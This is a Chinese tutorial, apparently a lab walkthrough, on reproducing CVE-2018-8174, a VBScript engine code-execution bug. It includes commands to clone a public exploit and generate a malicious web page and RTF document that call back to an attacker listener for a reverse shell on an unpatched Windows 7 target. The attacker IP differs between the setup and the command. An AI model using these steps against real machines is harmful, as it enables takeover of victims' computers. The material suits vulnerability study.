您好,登錄后才能下訂單哦!
本篇文章為大家展示了如何進行0day漏洞CVE-2018-8174復現,內容簡明扼要并且容易理解,絕對能使你眼前一亮,通過這篇文章的詳細介紹希望你能有所收獲。
CVE-2018-8174是Windows VBScriptEngine 代碼執行漏洞,由于 VBScript 腳本執行引擎(vbscript.dll)存在該漏洞,攻擊者可以將惡意的VBScript嵌入到Office文件或者網站中,一旦用戶受誘導或不慎點擊惡意鏈接或文檔,攻擊者便可遠程獲取當前用戶系統權限,進而完全控制用戶電腦。
2018年4月18日國內某信息安全公司監控到一例使用該漏洞的攻擊活動后,當天與微軟公司溝通,將相關信息提交到微軟。微軟在4月20日確認此漏洞,于5月8號發布了官方安全補丁對其進行修復,并將其命名為 CVE-2018-8174,在國內該漏洞則被稱為“雙殺”漏洞。
攻擊機:Linuxkali ip:192.168.1.117
靶機:Windows7專業版 ip:192.168.1.118
注:本次由于靶機環境限制,僅以網站點擊惡意鏈接獲取權限方法驗證該漏洞
首先從github下載項目:
#git clone https://github.com/Sch01ar/CVE-2018-8174_EXP
生成帶有惡意VBscript的html頁面和word文檔
#pythonCVE-2018-8174.py -u http://192.168.220.117/exploit.html -o msf.rtf -i192.168.220.117 -p 4444
其中:-u指定URL 地址,-o指定生成文檔,-i指定監聽地址,-p指定監聽端口
注:生成之前需進入到項目文件夾下,否則提示找不到文件
生成后ls查看當前目錄下的文件,確保所需要的文件完整
將explot.html復制到/var/www/html路徑下,并開啟apache服務
nc指令,用于監聽4444端口
開始監聽后,我們用靶機,也就是windows7瀏覽器打開攻擊機生成的惡意鏈接:192.168.1.117/exploit.html
雖然網頁報錯,但可以 發現攻擊機已經拿到靶機的系統權限
此漏洞已在2018年5月8日被微軟官方修復,win10不受此漏洞影響,win10以下版本安裝過該補丁后不受此漏洞影響。
上述內容就是如何進行0day漏洞CVE-2018-8174復現,你們學到知識或技能了嗎?如果還想學到更多技能或者豐富自己的知識儲備,歡迎關注億速云行業資訊頻道。
免責聲明:本站發布的內容(圖片、視頻和文字)以原創、轉載和分享為主,文章觀點不代表本網站立場,如果涉及侵權請聯系站長郵箱:is@yisu.com進行舉報,并提供相關證據,一經查實,將立刻刪除涉嫌侵權內容。